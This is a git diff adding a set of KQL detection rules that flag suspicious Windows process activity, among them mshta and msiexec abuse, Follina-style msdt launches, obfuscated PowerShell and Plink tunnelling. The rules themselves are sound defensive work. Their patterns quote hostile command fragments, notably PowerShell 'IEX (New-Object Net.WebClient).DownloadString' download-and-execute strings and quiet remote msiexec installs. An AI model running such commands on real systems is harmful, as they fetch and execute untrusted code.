--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_msbuild_execution_by_uncommon_parent_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Msbuild Execution By Uncommon Parent Process
+// Author: frack113
+// Date: 2022-11-17
+// Level: medium
+// Description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\MSBuild.exe" or ProcessVersionInfoOriginalFileName =~ "MSBuild.exe") and (not((InitiatingProcessFolderPath endswith "\\devenv.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\python.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\nuget.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_msdt_parent_process.kql b/KQL/rules/windows/process_creation/suspicious_msdt_parent_process.kql
new file mode 100644
index 00000000..342a5044
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_msdt_parent_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious MSDT Parent Process
+// Author: Nextron Systems
+// Date: 2022-06-01
+// Level: high
+// Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1218
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_mshta_child_process.kql b/KQL/rules/windows/process_creation/suspicious_mshta_child_process.kql
new file mode 100644
index 00000000..7c4b4a5b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_mshta_child_process.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious MSHTA Child Process
+// Author: Michael Haag
+// Date: 2019-01-16
+// Level: high
+// Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003
+// False Positives:
+//   - Printer software / driver installations
+//   - HP software
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\bitsadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe", "cscript.exe", "Bash.exe", "reg.exe", "REGSVR32.EXE", "bitsadmin.exe"))) and InitiatingProcessFolderPath endswith "\\mshta.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_mshta_exe_execution_patterns.kql b/KQL/rules/windows/process_creation/suspicious_mshta_exe_execution_patterns.kql
new file mode 100644
index 00000000..a3092b25
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_mshta_exe_execution_patterns.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Mshta.EXE Execution Patterns
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-07-17
+// Level: high
+// Description: Detects suspicious mshta process execution patterns
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1106
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and ((ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))) or ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and (not(((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\") or (ProcessCommandLine contains ".htm" or ProcessCommandLine contains ".hta") or (ProcessCommandLine endswith "mshta.exe" or ProcessCommandLine endswith "mshta")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_msiexec_embedding_parent.kql b/KQL/rules/windows/process_creation/suspicious_msiexec_embedding_parent.kql
new file mode 100644
index 00000000..0a793859
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_msiexec_embedding_parent.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious MsiExec Embedding Parent
+// Author: frack113
+// Date: 2022-04-16
+// Level: medium
+// Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218.007, attack.defense-evasion
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") and (InitiatingProcessCommandLine contains "MsiExec.exe" and InitiatingProcessCommandLine contains "-Embedding ")) and (not(((ProcessCommandLine contains "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" and FolderPath endswith ":\\Windows\\System32\\cmd.exe") or (ProcessCommandLine contains "\\DismFoDInstall.cmd" or (InitiatingProcessCommandLine contains "\\MsiExec.exe -Embedding " and InitiatingProcessCommandLine contains "Global\\MSI0000")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_msiexec_execute_arbitrary_dll.kql b/KQL/rules/windows/process_creation/suspicious_msiexec_execute_arbitrary_dll.kql
new file mode 100644
index 00000000..0d13b60e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_msiexec_execute_arbitrary_dll.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Msiexec Execute Arbitrary DLL
+// Author: frack113
+// Date: 2022-01-16
+// Level: medium
+// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
+// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007
+// False Positives:
+//   - Legitimate script
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -y" or ProcessCommandLine contains " /y" or ProcessCommandLine contains " –y" or ProcessCommandLine contains " —y" or ProcessCommandLine contains " ―y") and FolderPath endswith "\\msiexec.exe") and (not((ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" /Y C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y C:\\Windows\\CCM\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_msiexec_quiet_install_from_remote_location.kql b/KQL/rules/windows/process_creation/suspicious_msiexec_quiet_install_from_remote_location.kql
new file mode 100644
index 00000000..4e2b3576
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_msiexec_quiet_install_from_remote_location.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Msiexec Quiet Install From Remote Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-28
+// Level: medium
+// Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "–i" or ProcessCommandLine contains "—i" or ProcessCommandLine contains "―i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "–package" or ProcessCommandLine contains "—package" or ProcessCommandLine contains "―package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j" or ProcessCommandLine contains "–j" or ProcessCommandLine contains "—j" or ProcessCommandLine contains "―j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q") and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")) and (not((ProcessCommandLine contains "\\AppData\\Local\\Temp\\OpenOffice" and ProcessCommandLine contains "Installation Files\\openoffice")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/windows/process_creation/suspicious_mstsc_exe_execution_with_local_rdp_file.kql
new file mode 100644
index 00000000..da71f0ab
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_mstsc_exe_execution_with_local_rdp_file.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Mstsc.EXE Execution With Local RDP File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-18
+// Level: high
+// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Likelihood is related to how often the paths are used in the environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".rdp" or ProcessCommandLine endswith ".rdp\"") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated " or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Downloads\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_network_command.kql b/KQL/rules/windows/process_creation/suspicious_network_command.kql
new file mode 100644
index 00000000..2b43c97d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_network_command.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Network Command
+// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
+// Date: 2021-12-07
+// Level: low
+// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+//   - Administrator, hotline ask to user
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "ipconfig\\s+/all" or ProcessCommandLine matches regex "netsh\\s+interface show interface" or ProcessCommandLine matches regex "arp\\s+-a" or ProcessCommandLine matches regex "nbtstat\\s+-n" or ProcessCommandLine matches regex "net\\s+config" or ProcessCommandLine matches regex "route\\s+print"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_new_service_creation.kql b/KQL/rules/windows/process_creation/suspicious_new_service_creation.kql
new file mode 100644
index 00000000..308b2067
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_new_service_creation.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious New Service Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-14
+// Level: high
+// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql b/KQL/rules/windows/process_creation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql
new file mode 100644
index 00000000..890f936d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious NTLM Authentication on the Printer Spooler Service
+// Author: Elastic (idea), Tobias Michalski (Nextron Systems)
+// Date: 2022-05-04
+// Level: high
+// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.credential-access, attack.t1212
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_obfuscated_powershell_code.kql b/KQL/rules/windows/process_creation/suspicious_obfuscated_powershell_code.kql
new file mode 100644
index 00000000..7783b72a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_obfuscated_powershell_code.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Obfuscated PowerShell Code
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-11
+// Level: high
+// Description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "IAAtAGIAeABvAHIAIAAwAHgA" or ProcessCommandLine contains "AALQBiAHgAbwByACAAMAB4A" or ProcessCommandLine contains "gAC0AYgB4AG8AcgAgADAAeA" or ProcessCommandLine contains "AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg" or ProcessCommandLine contains "AuAEkAbgB2AG8AawBlACgAKQAgAHwAI" or ProcessCommandLine contains "ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AJwAgAC0AZgAg"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_outlook_child_process.kql b/KQL/rules/windows/process_creation/suspicious_outlook_child_process.kql
new file mode 100644
index 00000000..8a7a7cf6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_outlook_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Outlook Child Process
+// Author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team
+// Date: 2022-02-28
+// Level: high
+// Description: Detects a suspicious process spawning from an Outlook process.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_parent_double_extension_file_execution.kql b/KQL/rules/windows/process_creation/suspicious_parent_double_extension_file_execution.kql
new file mode 100644
index 00000000..382f4dff
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_parent_double_extension_file_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Parent Double Extension File Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-06
+// Level: high
+// Description: Detect execution of suspicious double extension files in ParentCommandLine
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.007
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith ".doc.lnk" or InitiatingProcessFolderPath endswith ".docx.lnk" or InitiatingProcessFolderPath endswith ".xls.lnk" or InitiatingProcessFolderPath endswith ".xlsx.lnk" or InitiatingProcessFolderPath endswith ".ppt.lnk" or InitiatingProcessFolderPath endswith ".pptx.lnk" or InitiatingProcessFolderPath endswith ".rtf.lnk" or InitiatingProcessFolderPath endswith ".pdf.lnk" or InitiatingProcessFolderPath endswith ".txt.lnk" or InitiatingProcessFolderPath endswith ".doc.js" or InitiatingProcessFolderPath endswith ".docx.js" or InitiatingProcessFolderPath endswith ".xls.js" or InitiatingProcessFolderPath endswith ".xlsx.js" or InitiatingProcessFolderPath endswith ".ppt.js" or InitiatingProcessFolderPath endswith ".pptx.js" or InitiatingProcessFolderPath endswith ".rtf.js" or InitiatingProcessFolderPath endswith ".pdf.js" or InitiatingProcessFolderPath endswith ".txt.js") or (InitiatingProcessCommandLine contains ".doc.lnk" or InitiatingProcessCommandLine contains ".docx.lnk" or InitiatingProcessCommandLine contains ".xls.lnk" or InitiatingProcessCommandLine contains ".xlsx.lnk" or InitiatingProcessCommandLine contains ".ppt.lnk" or InitiatingProcessCommandLine contains ".pptx.lnk" or InitiatingProcessCommandLine contains ".rtf.lnk" or InitiatingProcessCommandLine contains ".pdf.lnk" or InitiatingProcessCommandLine contains ".txt.lnk" or InitiatingProcessCommandLine contains ".doc.js" or InitiatingProcessCommandLine contains ".docx.js" or InitiatingProcessCommandLine contains ".xls.js" or InitiatingProcessCommandLine contains ".xlsx.js" or InitiatingProcessCommandLine contains ".ppt.js" or InitiatingProcessCommandLine contains ".pptx.js" or InitiatingProcessCommandLine contains ".rtf.js" or InitiatingProcessCommandLine contains ".pdf.js" or InitiatingProcessCommandLine contains ".txt.js")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/windows/process_creation/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
new file mode 100644
index 00000000..b732b260
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-14
+// Level: high
+// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_ping_del_command_combination.kql b/KQL/rules/windows/process_creation/suspicious_ping_del_command_combination.kql
new file mode 100644
index 00000000..9498dc5e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_ping_del_command_combination.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Ping/Del Command Combination
+// Author: Ilya Krestinichev
+// Date: 2022-11-03
+// Level: high
+// Description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ping" and ProcessCommandLine contains "del ") and (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f " or ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q " or ProcessCommandLine contains " –q " or ProcessCommandLine contains " —q " or ProcessCommandLine contains " ―q ") and ProcessCommandLine contains "Nul"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_plink_port_forwarding.kql b/KQL/rules/windows/process_creation/suspicious_plink_port_forwarding.kql
new file mode 100644
index 00000000..d1f4c7e6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_plink_port_forwarding.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Plink Port Forwarding
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-19
+// Level: high
+// Description: Detects suspicious Plink tunnel port forwarding to a local port
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001
+// False Positives:
+//   - Administrative activity using a remote port forwarding to a local port
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -R " and ProcessVersionInfoFileDescription =~ "Command-line SSH, Telnet, and Rlogin client"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql b/KQL/rules/windows/process_creation/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql
new file mode 100644
index 00000000..b47137d6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Powercfg Execution To Change Lock Screen Timeout
+// Author: frack113
+// Date: 2022-11-18
+// Level: medium
+// Description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\powercfg.exe" or ProcessVersionInfoOriginalFileName =~ "PowerCfg.exe") and ((ProcessCommandLine contains "/setacvalueindex " and ProcessCommandLine contains "SCHEME_CURRENT" and ProcessCommandLine contains "SUB_VIDEO" and ProcessCommandLine contains "VIDEOCONLOCK") or (ProcessCommandLine contains "-change " and ProcessCommandLine contains "-standby-timeout-"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_download_and_execute_pattern.kql b/KQL/rules/windows/process_creation/suspicious_powershell_download_and_execute_pattern.kql
new file mode 100644
index 00000000..73426311
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_download_and_execute_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell Download and Execute Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-28
+// Level: high
+// Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Software installers that pull packages from remote systems and execute them
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "IEX ((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX (New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX(New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains " -command (New-Object System.Net.WebClient).DownloadFile(" or ProcessCommandLine contains " -c (New-Object System.Net.WebClient).DownloadFile("
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_encoded_command_patterns.kql b/KQL/rules/windows/process_creation/suspicious_powershell_encoded_command_patterns.kql
new file mode 100644
index 00000000..a820413c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_encoded_command_patterns.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell Encoded Command Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-24
+// Level: high
+// Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Other tools that work with encoded scripts in the command line instead of script files
+
+DeviceProcessEvents
